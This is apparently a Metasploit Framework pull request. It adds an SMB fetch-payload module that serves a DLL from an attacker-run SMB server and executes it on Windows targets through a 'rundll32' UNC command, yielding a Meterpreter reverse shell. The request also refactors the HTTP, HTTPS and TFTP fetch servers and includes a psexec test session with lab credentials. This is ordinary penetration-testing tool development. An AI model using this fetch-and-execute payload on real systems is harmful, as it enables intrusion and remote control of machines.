### PR TITLE
Add an SMB-based fetch payload for Windows

### DIFF
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -265,7 +265,7 @@ GEM
       activesupport (~> 7.0)
       railties (~> 7.0)
       zeitwerk
-    metasploit-credential (6.0.6)
+    metasploit-credential (6.0.7)
       metasploit-concern
       metasploit-model
       metasploit_data_models (>= 5.0.0)

--- a/lib/msf/core/exploit/remote/smb/server/hash_capture.rb
+++ b/lib/msf/core/exploit/remote/smb/server/hash_capture.rb
@@ -62,7 +62,7 @@ module Msf::Exploit::Remote::SMB::Server::HashCapture
       origin = create_credential_origin_service(
         {
           address: address,
-          port: datastore['SRVPORT'],
+          port: srvport,
           service_name: 'smb',
           protocol: 'tcp',
           module_fullname: fullname,
@@ -74,7 +74,7 @@ module Msf::Exploit::Remote::SMB::Server::HashCapture
         origin: origin,
         origin_type: :service,
         address: address,
-        port: datastore['SRVPORT'],
+        port: srvport,
         service_name: 'smb',
         username: user,
         server_challenge: challenge,

--- a/lib/msf/core/exploit/remote/smb/server/share.rb
+++ b/lib/msf/core/exploit/remote/smb/server/share.rb
@@ -27,7 +27,6 @@ module Msf
 
         register_options(
           [
-            OptPort.new('SRVPORT',    [ true, 'The local port to listen on.', 445 ]),
             OptString.new('SHARE', [ false, 'Share (Default: random); cannot contain spaces or slashes'], regex: /^[^\s\/\\]*$/),
             OptString.new('FILE_NAME', [ false, 'File name to share (Default: random)']),
             OptString.new('FOLDER_NAME', [ false, 'Folder name to share (Default: none)'])

--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -7,7 +7,8 @@ module Msf::Payload::Adapter::Fetch
         Msf::OptBool.new('FETCH_DELETE', [true, 'Attempt to delete the binary after execution', false]),
         Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: /^[^\s\/\\]*$/),
         Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
-        Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ false, 'Local IP to use for serving payload']),
+        # FETCH_SRVHOST defaults to LHOST, but if the payload doesn't connect back to Metasploit (e.g. adduser, messagebox, etc.) then FETCH_SRVHOST needs to be set
+        Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ !options['LHOST']&.required, 'Local IP to use for serving payload']),
         Msf::OptString.new('FETCH_URIPATH', [ false, 'Local URI to use for serving payload', '']),
         Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', ''], regex:/^[\S]*$/)
       ]
@@ -80,8 +81,6 @@ module Msf::Payload::Adapter::Fetch
   end
 
   def generate(opts = {})
-    datastore['FETCH_SRVHOST'] = datastore['LHOST'] if datastore['FETCH_SRVHOST'].blank?
-    fail_with(Msf::Module::Failure::BadConfig, 'FETCH_SRVHOST required') if datastore['FETCH_SRVHOST'].blank?
     opts[:arch] ||= module_info['AdaptedArch']
     opts[:code] = super
     @srvexe = generate_payload_exe(opts)
@@ -128,7 +127,10 @@ module Msf::Payload::Adapter::Fetch
   end
 
   def srvhost
-    datastore['FETCH_SRVHOST']
+    host = datastore['FETCH_SRVHOST']
+    host = datastore['LHOST'] if host.blank?
+    host = '127.127.127.127' if host.blank?
+    host
   end
 
   def srvnetloc

--- a/lib/msf/core/payload/adapter/fetch.rb
+++ b/lib/msf/core/payload/adapter/fetch.rb
@@ -5,19 +5,18 @@ module Msf::Payload::Adapter::Fetch
     register_options(
       [
         Msf::OptBool.new('FETCH_DELETE', [true, 'Attempt to delete the binary after execution', false]),
-        Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces.', Rex::Text.rand_text_alpha(rand(8..12))], regex:/^[\S]*$/),
+        Msf::OptString.new('FETCH_FILENAME', [ false, 'Name to use on remote system when storing payload; cannot contain spaces or slashes', Rex::Text.rand_text_alpha(rand(8..12))], regex: /^[^\s\/\\]*$/),
         Msf::OptPort.new('FETCH_SRVPORT', [true, 'Local port to use for serving payload', 8080]),
         Msf::OptAddressRoutable.new('FETCH_SRVHOST', [ false, 'Local IP to use for serving payload']),
         Msf::OptString.new('FETCH_URIPATH', [ false, 'Local URI to use for serving payload', '']),
-        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces.', ''], regex:/^[\S]*$/)
+        Msf::OptString.new('FETCH_WRITABLE_DIR', [ true, 'Remote writable dir to store payload; cannot contain spaces', ''], regex:/^[\S]*$/)
       ]
     )
     register_advanced_options(
       [
         Msf::OptAddress.new('FetchListenerBindAddress', [ false, 'The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST']),
         Msf::OptPort.new('FetchListenerBindPort', [false, 'The port to bind to if different from FETCH_SRVPORT']),
-        Msf::OptBool.new('FetchHandlerDisable', [true, 'Disable fetch handler', false]),
-        Msf::OptString.new('FetchServerName', [true, 'Fetch Server Name', 'Apache'])
+        Msf::OptBool.new('FetchHandlerDisable', [true, 'Disable fetch handler', false])
       ]
     )
     @delete_resource = true
@@ -27,7 +26,6 @@ module Msf::Payload::Adapter::Fetch
     @remote_destination_win = nil
     @remote_destination_nix = nil
     @windows = nil
-
   end
 
   # If no fetch URL is provided, we generate one based off the underlying payload data
@@ -75,6 +73,10 @@ module Msf::Payload::Adapter::Fetch
 
   def fetch_bindport
     datastore['FetchListenerBindPort'].blank? ? srvport : datastore['FetchListenerBindPort']
+  end
+
+  def fetch_bindnetloc
+    Rex::Socket.to_authority(fetch_bindhost, fetch_bindport)
   end
 
   def generate(opts = {})
@@ -130,13 +132,7 @@ module Msf::Payload::Adapter::Fetch
   end
 
   def srvnetloc
-    netloc = srvhost
-    if Rex::Socket.is_ipv6?(netloc)
-      netloc = "[#{netloc}]:#{srvport}"
-    else
-      netloc = "#{netloc}:#{srvport}"
-    end
-    netloc
+    Rex::Socket.to_authority(srvhost, srvport)
   end
 
   def srvport
@@ -146,10 +142,6 @@ module Msf::Payload::Adapter::Fetch
   def srvuri
     return datastore['FETCH_URIPATH'] unless datastore['FETCH_URIPATH'].blank?
     default_srvuri
-  end
-
-  def srvname
-    datastore['FetchServerName']
   end
 
   def windows?
@@ -242,7 +234,6 @@ module Msf::Payload::Adapter::Fetch
     end
     cmd + _execute_add
   end
-
 
   def _generate_ftp_command
     case fetch_protocol

--- a/lib/msf/core/payload/adapter/fetch/http.rb
+++ b/lib/msf/core/payload/adapter/fetch/http.rb
@@ -10,7 +10,11 @@ module Msf::Payload::Adapter::Fetch::HTTP
   end
 
   def cleanup_handler
-    cleanup_http_fetch_service(@fetch_service, @delete_resource)
+    if @fetch_service
+      cleanup_http_fetch_service(@fetch_service, @delete_resource)
+      @fetch_service = nil
+    end
+
     super
   end
 
@@ -20,4 +24,3 @@ module Msf::Payload::Adapter::Fetch::HTTP
   end
 
 end
-

--- a/lib/msf/core/payload/adapter/fetch/https.rb
+++ b/lib/msf/core/payload/adapter/fetch/https.rb
@@ -10,7 +10,11 @@ module Msf::Payload::Adapter::Fetch::Https
   end
 
   def cleanup_handler
-    cleanup_http_fetch_service(@fetch_service, @delete_resource)
+    if @fetch_service
+      cleanup_http_fetch_service(@fetch_service, @delete_resource)
+      @fetch_service = nil
+    end
+
     super
   end
 

--- a/lib/msf/core/payload/adapter/fetch/server/http.rb
+++ b/lib/msf/core/payload/adapter/fetch/server/http.rb
@@ -1,19 +1,13 @@
 module Msf::Payload::Adapter::Fetch::Server::HTTP
-  include Msf::Payload::Adapter::Fetch::Server::Https
 
-  # This mixin supports only HTTP fetch handlers but still imports the HTTPS mixin.
-  # We just remove the HTTPS Options so the user does not see them.
-  #
+  # This mixin supports only HTTP fetch handlers.
 
   def initialize(*args)
     super
-    deregister_options('FETCH_SSL',
-                       'FETCH_CHECK_CERT',
-                       'FetchSSLCert',
-                       'FetchSSLCompression',
-                       'FetchSSLCipher',
-                       'FetchSSLCipher',
-                       'FetchSSLVersion'
+    register_advanced_options(
+      [
+        Msf::OptString.new('FetchHttpServerName', [true, 'Fetch HTTP server name', 'Apache'])
+      ]
     )
   end
 
@@ -21,4 +15,96 @@ module Msf::Payload::Adapter::Fetch::Server::HTTP
     'HTTP'
   end
 
+  def srvname
+    datastore['FetchHttpServerName']
+  end
+
+  def add_resource(fetch_service, uri, srvexe)
+    vprint_status("Adding resource #{uri}")
+    if fetch_service.resources.include?(uri)
+      # When we clean up, we need to leave resources alone, because we never added one.
+      @delete_resource = false
+      fail_with(Msf::Exploit::Failure::BadConfig, "Resource collision detected. Set FETCH_URIPATH to a different value to continue.")
+    end
+    fetch_service.add_resource(uri,
+                               'Proc' => proc do |cli, req|
+                                 on_request_uri(cli, req, srvexe)
+                               end,
+                               'VirtualDirectory' => true)
+  rescue  ::Exception => e
+    # When we clean up, we need to leave resources alone, because we never added one.
+    @delete_resource = false
+    fail_with(Msf::Exploit::Failure::Unknown, "Failed to add resource\n #{e}")
+  end
+
+  def cleanup_http_fetch_service(fetch_service, delete_resource)
+    escaped_srvuri = ('/' + srvuri).gsub('//', '/')
+    if fetch_service.resources.include?(escaped_srvuri) && delete_resource
+      fetch_service.remove_resource(escaped_srvuri)
+    end
+    fetch_service.deref
+    if fetch_service.resources.empty?
+      # if we don't call deref, we cannot start another httpserver
+      # this is a reimplementation of the cleanup_service method
+      # in Exploit::Remote::SocketServer
+      temp_service = fetch_service
+      temp_service.cleanup
+      temp_service.deref
+    end
+  end
+
+  def start_http_fetch_handler(srvname, srvexe, ssl=false, ssl_cert=nil, ssl_compression=nil, ssl_cipher=nil, ssl_version=nil)
+    # this looks a bit funny because I converted it to use an instance variable so that if we crash in the
+    # middle and don't return a value, we still have the right fetch_service to clean up.
+    escaped_srvuri = ('/' + srvuri).gsub('//', '/')
+    fetch_service = start_http_server(ssl, ssl_cert, ssl_compression, ssl_cipher, ssl_version)
+    if fetch_service.nil?
+      cleanup_handler
+      fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{fetch_bindnetloc}")
+    end
+    vprint_status("#{fetch_protocol} server started")
+    fetch_service.server_name = srvname
+    add_resource(fetch_service, escaped_srvuri, srvexe)
+    fetch_service
+  end
+
+  def on_request_uri(cli, request, srvexe)
+    client = cli.peerhost
+    vprint_status("Client #{client} requested #{request.uri}")
+    if (user_agent = request.headers['User-Agent'])
+      client += " (#{user_agent})"
+    end
+    vprint_status("Sending payload to #{client}")
+    cli.send_response(payload_response(srvexe))
+  end
+
+  def payload_response(srvexe)
+    res = Rex::Proto::Http::Response.new(200, 'OK', Rex::Proto::Http::DefaultProtocol)
+    res['Content-Type'] = 'text/html'
+    res.body = srvexe.to_s.unpack('C*').pack('C*')
+    res
+  end
+
+  def start_http_server(ssl=false, ssl_cert=nil, ssl_compression=nil, ssl_cipher=nil, ssl_version=nil)
+    begin
+      fetch_service = Rex::ServiceManager.start(
+        Rex::Proto::Http::Server,
+        fetch_bindport, fetch_bindhost, ssl,
+        {
+          'Msf' => framework,
+          'MsfExploit' => self
+        },
+        _determine_server_comm(fetch_bindhost),
+        ssl_cert,
+        ssl_compression,
+        ssl_cipher,
+        ssl_version
+      )
+    rescue Exception => e
+      cleanup_handler
+      fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{fetch_bindnetloc}\n#{e}")
+    end
+    vprint_status("Fetch handler listening on #{fetch_bindnetloc}")
+    fetch_service
+  end
 end

--- a/lib/msf/core/payload/adapter/fetch/server/http.rb
+++ b/lib/msf/core/payload/adapter/fetch/server/http.rb
@@ -34,7 +34,7 @@ module Msf::Payload::Adapter::Fetch::Server::HTTP
   rescue  ::Exception => e
     # When we clean up, we need to leave resources alone, because we never added one.
     @delete_resource = false
-    fail_with(Msf::Exploit::Failure::Unknown, "Failed to add resource\n #{e}")
+    fail_with(Msf::Exploit::Failure::Unknown, "Failed to add resource\n#{e}")
   end
 
   def cleanup_http_fetch_service(fetch_service, delete_resource)
@@ -43,14 +43,6 @@ module Msf::Payload::Adapter::Fetch::Server::HTTP
       fetch_service.remove_resource(escaped_srvuri)
     end
     fetch_service.deref
-    if fetch_service.resources.empty?
-      # if we don't call deref, we cannot start another httpserver
-      # this is a reimplementation of the cleanup_service method
-      # in Exploit::Remote::SocketServer
-      temp_service = fetch_service
-      temp_service.cleanup
-      temp_service.deref
-    end
   end
 
   def start_http_fetch_handler(srvname, srvexe, ssl=false, ssl_cert=nil, ssl_compression=nil, ssl_cipher=nil, ssl_version=nil)

--- a/lib/msf/core/payload/adapter/fetch/server/https.rb
+++ b/lib/msf/core/payload/adapter/fetch/server/https.rb
@@ -1,4 +1,5 @@
 module Msf::Payload::Adapter::Fetch::Server::Https
+  include Msf::Payload::Adapter::Fetch::Server::HTTP
 
   # This mixin supports both HTTP and HTTPS fetch handlers.  If you only want
   # HTTP, use the HTTP mixin that imports this, but removes the HTTPS options
@@ -6,13 +7,11 @@ module Msf::Payload::Adapter::Fetch::Server::Https
     super
     register_options(
       [
-        Msf::OptBool.new('FETCH_CHECK_CERT', [true,"Check SSL certificate", false])
-
+        Msf::OptBool.new('FETCH_CHECK_CERT', [true, 'Check SSL certificate', false])
       ]
     )
     register_advanced_options(
       [
-        Msf::OptString.new('FetchHttpServerName', [true, 'Http Server Name', 'Apache']),
         Msf::OptPath.new('FetchSSLCert', [ false, 'Path to a custom SSL certificate (default is randomly generated)', '']),
         Msf::OptBool.new('FetchSSLCompression', [ false, 'Enable SSL/TLS-level compression', false ]),
         Msf::OptString.new('FetchSSLCipher', [ false, 'String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"']),
@@ -23,62 +22,8 @@ module Msf::Payload::Adapter::Fetch::Server::Https
     )
   end
 
-  def add_resource(fetch_service, uri, srvexe)
-    vprint_status("Adding resource #{uri}")
-    if fetch_service.resources.include?(uri)
-      # When we clean up, we need to leave resources alone, because we never added one.
-      @delete_resource = false
-      fail_with(Msf::Exploit::Failure::BadConfig, "Resource collision detected.  Set FETCH_URI to a different value to continue.")
-    end
-    fetch_service.add_resource(uri,
-                               'Proc' => proc do |cli, req|
-                                 on_request_uri(cli, req, srvexe)
-                               end,
-                               'VirtualDirectory' => true)
-  rescue  ::Exception => e
-    # When we clean up, we need to leave resources alone, because we never added one.
-    @delete_resource = false
-    fail_with(Msf::Exploit::Failure::Unknown, "Failed to add resource\n #{e}")
-  end
-
-  def cleanup_http_fetch_service(fetch_service, delete_resource)
-    unless fetch_service.nil?
-      escaped_srvuri = ('/' + srvuri).gsub('//', '/')
-      if fetch_service.resources.include?(escaped_srvuri) && delete_resource
-        fetch_service.remove_resource(escaped_srvuri)
-      end
-      fetch_service.deref
-      if fetch_service.resources.empty?
-        # if we don't call deref, we cannot start another httpserver
-        # this is a reimplementation of the cleanup_service method
-        # in Exploit::Remote::SocketServer
-        temp_service = fetch_service
-        fetch_service = nil
-        temp_service.cleanup
-        temp_service.deref
-      end
-    end
-  end
-
   def fetch_protocol
     'HTTPS'
-  end
-
-  def on_request_uri(cli, request, srvexe)
-    client = cli.peerhost
-    vprint_status("Client #{client} requested #{request.uri}")
-    if (user_agent = request.headers['User-Agent'])
-      client += " (#{user_agent})"
-    end
-    vprint_status("Sending payload to #{client}")
-    cli.send_response(payload_response(srvexe))
-  end
-
-  def payload_response(srvexe)
-    res = Rex::Proto::Http::Response.new(200, 'OK', Rex::Proto::Http::DefaultProtocol)
-    res['Content-Type'] = 'text/html'
-    res.body = srvexe.to_s.unpack('C*').pack('C*')
-    res
   end
 
   def ssl_cert
@@ -97,57 +42,7 @@ module Msf::Payload::Adapter::Fetch::Server::Https
     datastore['FetchSSLVersion']
   end
 
-  def start_http_fetch_handler(srvname, srvexe)
-    # this looks a bit funny because I converted it to use an instance variable so that if we crash in the
-    # middle and don't return a value, we still have the right fetch_service to clean up.
-    escaped_srvuri = ('/' + srvuri).gsub('//', '/')
-    @fetch_service = start_https_server(false, nil, nil, nil, nil) if @fetch_service.nil?
-    if @fetch_service.nil?
-      cleanup_handler
-      fail_with(Msf::Exploit::Failure::BadConfig, "Fetch Handler failed to start on #{fetch_bindhost}:#{fetch_bindport}")
-    end
-    vprint_status('HTTP server started')
-    @fetch_service.server_name = srvname
-    add_resource(@fetch_service, escaped_srvuri, srvexe)
-    @fetch_service
-  end
-
   def start_https_fetch_handler(srvname, srvexe)
-    # this looks a bit funny because I converted it to use an instance variable so that if we crash in the
-    # middle and don't return a value, we still have the right fetch_service to clean up.
-    escaped_srvuri = ('/' + srvuri).gsub('//', '/')
-    @fetch_service = start_https_server(true, ssl_cert, ssl_compression, ssl_cipher, ssl_version) if @fetch_service.nil?
-    if @fetch_service.nil?
-      cleanup_handler
-      fail_with(Msf::Exploit::Failure::BadConfig, "Fetch Handler failed to start on #{fetch_bindhost}:#{fetch_bindport}\n #{e}")
-    end
-    vprint_status('HTTPS server started')
-    @fetch_service.server_name = srvname
-    add_resource(@fetch_service, escaped_srvuri, srvexe)
-    @fetch_service
+    start_http_fetch_handler(srvname, srvexe, true, ssl_cert, ssl_compression, ssl_cipher, ssl_version)
   end
-
-  def start_https_server(ssl, ssl_cert, ssl_compression, ssl_cipher, ssl_version)
-    begin
-      fetch_service = Rex::ServiceManager.start(
-        Rex::Proto::Http::Server,
-        fetch_bindport, fetch_bindhost, ssl,
-        {
-          'Msf' => framework,
-          'MsfExploit' => self
-        },
-        _determine_server_comm(fetch_bindhost),
-        ssl_cert,
-        ssl_compression,
-        ssl_cipher,
-        ssl_version
-      )
-    rescue Exception => e
-      cleanup_handler
-      fail_with(Msf::Exploit::Failure::BadConfig, "Fetch Handler failed to start on #{fetch_bindhost}:#{fetch_bindport}\n #{e}")
-    end
-    vprint_status("Fetch Handler listening on #{fetch_bindhost}:#{fetch_bindport}")
-    fetch_service
-  end
-
 end

--- a/lib/msf/core/payload/adapter/fetch/server/smb.rb
+++ b/lib/msf/core/payload/adapter/fetch/server/smb.rb
@@ -64,5 +64,8 @@ module Msf::Payload::Adapter::Fetch::Server::SMB
     fetch_service
   end
 
+  def on_client_connect(client)
+    vprint_status("Received SMB connection from #{client.peerhost}")
+  end
 end
 

--- a/lib/msf/core/payload/adapter/fetch/server/smb.rb
+++ b/lib/msf/core/payload/adapter/fetch/server/smb.rb
@@ -54,7 +54,12 @@ module Msf::Payload::Adapter::Fetch::Server::SMB
     fetch_service = start_smb_server(srvport, srvhost)
     if fetch_service.nil?
       cleanup_handler
-      fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{Rex::Socket.to_authority(srvhost, srvport)}\n#{e}")
+      fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{Rex::Socket.to_authority(srvhost, srvport)}")
+    end
+
+    if fetch_service.shares.key?(share_name)
+      cleanup_smb_fetch_service(fetch_service)
+      fail_with(Msf::Exploit::Failure::BadConfig, "The specified SMB share '#{share_name}' already exists.")
     end
 
     @fetch_virtual_disk = RubySMB::Server::Share::Provider::VirtualDisk.new(share_name)

--- a/lib/msf/core/payload/adapter/fetch/server/smb.rb
+++ b/lib/msf/core/payload/adapter/fetch/server/smb.rb
@@ -1,0 +1,68 @@
+module Msf::Payload::Adapter::Fetch::Server::SMB
+
+  include ::Msf::Exploit::Remote::SMB::LogAdapter
+  include ::Msf::Exploit::Remote::SMB::Server::HashCapture
+
+  def start_smb_server(srvport, srvhost)
+    vprint_status("Starting SMB server on #{Rex::Socket.to_authority(srvhost, srvport)}")
+
+    log_device = LogDevice::Framework.new(framework)
+    logger = Logger.new(self, log_device)
+
+    ntlm_provider = Msf::Exploit::Remote::SMB::Server::HashCapture::HashCaptureNTLMProvider.new(
+      allow_anonymous: true,
+      allow_guests: true,
+      listener: self,
+      ntlm_type3_status: nil
+    )
+
+    fetch_service = Rex::ServiceManager.start(
+      Rex::Proto::SMB::Server,
+      srvport,
+      srvhost,
+      {
+        'Msf'        => framework,
+        'MsfExploit' => self,
+      },
+      _determine_server_comm(srvhost),
+      gss_provider: ntlm_provider,
+      logger: logger
+    )
+
+    fetch_service.on_client_connect_proc = Proc.new { |client|
+      on_client_connect(client)
+    }
+    fetch_service
+  end
+
+  def cleanup_smb_fetch_service(fetch_service)
+    fetch_service.remove_share(@fetch_virtual_disk)
+    fetch_service.deref
+  end
+
+  def fetch_protocol
+    'SMB'
+  end
+
+  def start_smb_fetch_handler(srvport, srvhost, srvuri, srvexe)
+    unless srvuri.include?('\\')
+      raise RuntimeError, 'The srvuri argument must include a share name'
+    end
+
+    share_name, _, share_path = srvuri.partition('\\')
+
+    fetch_service = start_smb_server(srvport, srvhost)
+    if fetch_service.nil?
+      cleanup_handler
+      fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{Rex::Socket.to_authority(srvhost, srvport)}\n#{e}")
+    end
+
+    @fetch_virtual_disk = RubySMB::Server::Share::Provider::VirtualDisk.new(share_name)
+    # the virtual disk expects the path to use the native File::SEPARATOR so normalize on that here
+    @fetch_virtual_disk.add_static_file(share_path, srvexe)
+    fetch_service.add_share(@fetch_virtual_disk)
+    fetch_service
+  end
+
+end
+

--- a/lib/msf/core/payload/adapter/fetch/server/tftp.rb
+++ b/lib/msf/core/payload/adapter/fetch/server/tftp.rb
@@ -1,7 +1,7 @@
 module Msf::Payload::Adapter::Fetch::Server::TFTP
 
   def start_tftp_server(srvport, srvhost)
-    vprint_status("Starting TFTP server on #{srvhost}:#{srvport}")
+    vprint_status("Starting TFTP server on #{Rex::Socket.to_authority(srvhost, srvport)}")
     Rex::Proto::TFTP::Server.new(srvport, srvhost, {})
   end
 
@@ -14,7 +14,7 @@ module Msf::Payload::Adapter::Fetch::Server::TFTP
     )
   end
   def cleanup_tftp_fetch_service(fetch_service)
-    fetch_service.stop unless fetch_service.nil?
+    fetch_service.stop
   end
 
   def fetch_protocol
@@ -25,7 +25,7 @@ module Msf::Payload::Adapter::Fetch::Server::TFTP
     fetch_service = start_tftp_server(srvport, srvhost)
     if fetch_service.nil?
       cleanup_handler
-      fail_with(Msf::Exploit::Failure::BadConfig, "Fetch Handler failed to start on #{srvhost}:#{srvport}\n #{e}")
+      fail_with(Msf::Exploit::Failure::BadConfig, "Fetch handler failed to start on #{srvhost}:#{srvport}\n#{e}")
     end
     fetch_service.register_file(srvuri, srvexe, datastore['FETCH_SRVONCE'])
     fetch_service.start

--- a/lib/msf/core/payload/adapter/fetch/smb.rb
+++ b/lib/msf/core/payload/adapter/fetch/smb.rb
@@ -1,0 +1,42 @@
+module Msf::Payload::Adapter::Fetch::SMB
+
+  include Msf::Exploit::EXE
+  include Msf::Payload::Adapter
+  include Msf::Payload::Adapter::Fetch
+  include Msf::Payload::Adapter::Fetch::Server::SMB
+
+
+  def initialize(*args)
+    super
+    register_options(
+      [
+        Msf::OptString.new('FETCH_FILENAME', [ true, 'Payload file name to fetch; cannot contain spaces or slashes.', 'test.dll'], regex: /^[^\s\/\\]*$/),
+      ]
+    )
+  end
+
+  def fetch_protocol
+    'SMB'
+  end
+
+  def cleanup_handler
+    if @fetch_service
+      cleanup_smb_fetch_service(@fetch_service)
+      @fetch_service = nil
+    end
+
+    super
+  end
+
+  def setup_handler
+    @fetch_service = start_smb_fetch_handler(fetch_bindport, fetch_bindhost, srvuri + "\\#{datastore['FETCH_FILENAME']}", @srvexe)
+    super
+  end
+
+  def unc
+    path = "\\\\#{srvhost}"
+    path << "\\#{srvuri.gsub('/', "\\").chomp("\\")}"
+    path << "\\#{datastore['FETCH_FILENAME']}" if datastore['FETCH_FILENAME'].present?
+    path
+  end
+end

--- a/lib/msf/core/payload/adapter/fetch/tftp.rb
+++ b/lib/msf/core/payload/adapter/fetch/tftp.rb
@@ -10,7 +10,11 @@ module Msf::Payload::Adapter::Fetch::TFTP
   end
 
   def cleanup_handler
-    cleanup_tftp_fetch_service(@fetch_service)
+    if @fetch_service
+      cleanup_tftp_fetch_service(@fetch_service)
+      @fetch_service = nil
+    end
+
     super
   end
 

--- a/lib/msf/core/session_compatibility.rb
+++ b/lib/msf/core/session_compatibility.rb
@@ -74,7 +74,9 @@ module Msf
     #
     # Default cleanup handler does nothing
     #
-    def cleanup; end
+    def cleanup
+      super if defined?(super)
+    end
 
     #
     # Return the associated session or nil if there isn't one

--- a/modules/payloads/adapters/cmd/windows/http/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/http/x64.rb
@@ -12,7 +12,7 @@ module MetasploitModule
       update_info(
         info,
         'Name' => 'HTTP Fetch',
-        'Description' => 'Fetch and Execute an x64 payload from an http server',
+        'Description' => 'Fetch and execute an x64 payload from an HTTP server.',
         'DefaultOptions' => { 'FETCH_COMMAND' => 'CERTUTIL' },
         'Author' => 'Brendan Watters',
         'Platform' => 'win',

--- a/modules/payloads/adapters/cmd/windows/https/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/https/x64.rb
@@ -12,7 +12,7 @@ module MetasploitModule
       update_info(
         info,
         'Name' => 'HTTPS Fetch',
-        'Description' => 'Fetch and Execute an x64 payload from an https server',
+        'Description' => 'Fetch and execute an x64 payload from an HTTPS server.',
         'Author' => 'Brendan Watters',
         'Platform' => 'win',
         'Arch' => ARCH_CMD,

--- a/modules/payloads/adapters/cmd/windows/smb/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/smb/x64.rb
@@ -1,0 +1,36 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+module MetasploitModule
+  include Msf::Payload::Adapter::Fetch::SMB
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'SMB Fetch',
+        'Description' => 'Fetch and execute an x64 payload from an SMB server.',
+        'Author' => 'Spencer McIntyre',
+        'Platform' => 'win',
+        'Arch' => ARCH_CMD,
+        'License' => MSF_LICENSE,
+        'AdaptedArch' => ARCH_X64,
+        'AdaptedPlatform' => 'win'
+      )
+    )
+    deregister_options('FETCH_DELETE', 'FETCH_SRVPORT', 'FETCH_WRITABLE_DIR')
+  end
+
+  def srvport
+    445 # UNC paths for SMB services *must* be 445
+  end
+
+  def generate_fetch_commands
+    "rundll32 #{unc},0"
+  end
+
+  # generate a DLL instead of an EXE
+  alias generate_payload_exe generate_payload_dll
+end

--- a/modules/payloads/adapters/cmd/windows/tftp/x64.rb
+++ b/modules/payloads/adapters/cmd/windows/tftp/x64.rb
@@ -12,7 +12,7 @@ module MetasploitModule
       update_info(
         info,
         'Name' => 'TFTP Fetch',
-        'Description' => 'Fetch and Execute an x64 payload from a tftp server',
+        'Description' => 'Fetch and execute an x64 payload from a TFTP server.',
         'Author' => 'Brendan Watters',
         'Platform' => 'win',
         'Arch' => ARCH_CMD,

--- a/spec/modules/payloads_spec.rb
+++ b/spec/modules/payloads_spec.rb
@@ -1358,6 +1358,14 @@ RSpec.describe 'modules/payloads', :content do
                           reference_name: 'cmd/windows/jjs_reverse_tcp'
   end
 
+  context 'cmd/windows/smb/x64' do
+    it_should_behave_like 'payload is not cached',
+                          ancestor_reference_names: [
+                            'adapters/cmd/windows/smb/x64'
+                          ],
+                          reference_name: 'cmd/windows/smb/x64'
+  end
+
   context 'cmd/windows/tftp/x64' do
     it_should_behave_like 'payload is not cached',
                           ancestor_reference_names: [


### PR DESCRIPTION
Additionally closes https://github.com/rapid7/metasploit-framework/pull/18664

This adds an SMB fetch-payload service and a new payload to use it. The payload invokes `rundll32` but handles everything for the user automatically. This is basically the same as what the `exploit/windows/smb/smb_delivery` module does but as a payload meaning that the generated command can be automatically incorporated into exploits for the Windows platform that have an ARCH_CMD target.

Also included are some changes in commit 0fd551751c4c4b4f22c8b2f0f7f2f4340a64e608 that fix up some things I noticed while figuring out how to implement a new fetch server. Overall, they aim to make things behave more consistently and fix up some text strings that are displayed to the user.

- [ ] Test the new `payload/cmd/windows/smb/x64/meterpreter/reverse_tcp` module
    * Since Windows 10 v1709 (Redstone 3), Windows has blocked outbound guest access in SMB2 and SMB3. To enable it, set a group policy as outlined [in this article.](https://learn.microsoft.com/en-us/troubleshoot/windows-server/networking/guest-access-in-smb2-is-disabled-by-default#resolution)
    - [ ] Any exploit that delivers a Windows ARCH_CMD payload should work, but PSexec is probably the easiest to get up and running
- [ ] Retest the HTTP and HTTPS payloads to verify the changes don't impact them

```
msf6 exploit(windows/smb/psexec) > creds
Credentials
===========

host  origin  service  public  private  realm  private_type  JtR Format  cracked_password
----  ------  -------  ------  -------  -----  ------------  ----------  ----------------

msf6 exploit(windows/smb/psexec) > set TARGET Command 
TARGET => Command
msf6 exploit(windows/smb/psexec) > set PAYLOAD cmd/windows/smb/x64/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/smb/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/psexec) > set LHOST 192.168.159.128
LHOST => 192.168.159.128
msf6 exploit(windows/smb/psexec) > show options 

Module options (exploit/windows/smb/psexec):

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   RHOSTS                192.168.159.10   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                 445              yes       The SMB service port (TCP)
   SERVICE_DESCRIPTION                    no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                   no        The service display name
   SERVICE_NAME                           no        The service name
   SMBDomain             MSFLAB           no        The Windows domain to use for authentication
   SMBPass               Password1!       no        The password for the specified username
   SMBSHARE                               no        The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBUser               smcintyre        no        The username to authenticate as


Payload options (cmd/windows/smb/x64/meterpreter/reverse_tcp):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
